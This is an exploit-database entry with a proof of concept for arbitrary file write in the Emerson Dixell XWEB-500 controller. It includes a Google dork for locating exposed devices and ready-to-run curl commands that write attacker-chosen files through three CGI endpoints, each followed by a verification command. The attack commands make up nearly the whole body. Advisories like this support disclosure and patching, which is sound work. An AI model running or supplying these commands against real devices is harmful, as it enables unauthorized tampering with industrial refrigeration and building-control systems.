Dixell XWEB 500 Arbitrary File Write

2022.01.05
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Dixell XWEB-500 - Arbitrary File Write # Google Dork: inurl:"xweb500.cgi" # Date: 03/01/2022 # Exploit Author: Roberto Palamaro # Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it # Version: XWEB-500 # Tested on: Dixell XWEB-500 # References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/ # Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability # Endpoint: logo_extra_upload.cgi # Here the first line of the POC is the filename and the second one is the content of the file be written # Write file echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -is "http://[target]:[port]/logo/" # Endpoint: lo_utils.cgi # Here ACTION=5 is to enable write mode echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify using ACTION=3 to listing resources echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Endpoint: cal_save.cgi # Here the first line of the POC is the filename and the second one is the content of the file be written echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top